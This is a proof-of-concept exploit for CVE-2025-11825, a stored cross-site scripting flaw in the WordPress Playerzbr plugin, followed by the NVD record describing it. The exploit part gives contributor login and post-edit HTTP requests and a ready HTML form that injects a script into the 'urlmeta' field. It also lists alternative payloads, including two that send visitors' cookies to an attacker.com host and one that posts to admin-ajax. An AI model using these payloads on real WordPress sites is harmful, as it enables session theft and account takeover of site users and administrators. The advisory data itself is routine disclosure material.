CVE-2025-11825

<!-- CVE-2025-11825 PoC: Stored XSS in WordPress Playerzbr Plugin Vulnerable field: urlmeta (post meta) Required privilege: Contributor level or above --> <!-- Step 1: Login as contributor-level user --> POST /wp-login.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded log=contributor_user&pwd=password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1 <!-- Step 2: Create/Edit post with malicious urlmeta field --> POST /wp-admin/post.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_xxx=xxx --- <!-- HTML Form for manual exploitation --> <form action="/wp-admin/post.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="editpost"> <input type="hidden" name="post_ID" value="POST_ID"> <input type="hidden" name="post_type" value="post"> <input type="text" name="post_title" value="Test Post"> <textarea name="content">Normal content here</textarea> <!-- Inject malicious script into urlmeta field --> <input type="text" name="urlmeta" value='"><script>alert(document.cookie)</script>'> <input type="submit" value="Update"> </form> <!-- Alternative payload examples for urlmeta field --> <!-- Payload 1: Cookie stealing --> <script>document.location="http://attacker.com/steal?c="+document.cookie</script> <!-- Payload 2: Event-based XSS --> "><img src=x onerror=fetch("http://attacker.com/log?data="+document.cookie)> <!-- Payload 3: DOM manipulation --> <script>fetch('/wp-admin/admin-ajax.php',{method:'POST',body:'action=editpost&post_ID=1&post_type=page'})</script>

{"cve": {"id": "CVE-2025-11825", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:34.160", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Playerzbr plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'urlmeta' post meta field in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/playerzbr/tags/1.6/playerzbr.php#L193", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/playerzbr/tags/1.6/playerzbr.php#L229", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ff065219-7f4f-4445-8dbe-11f4975f7bb9?source=cve", "source": "[email protected]"}]}}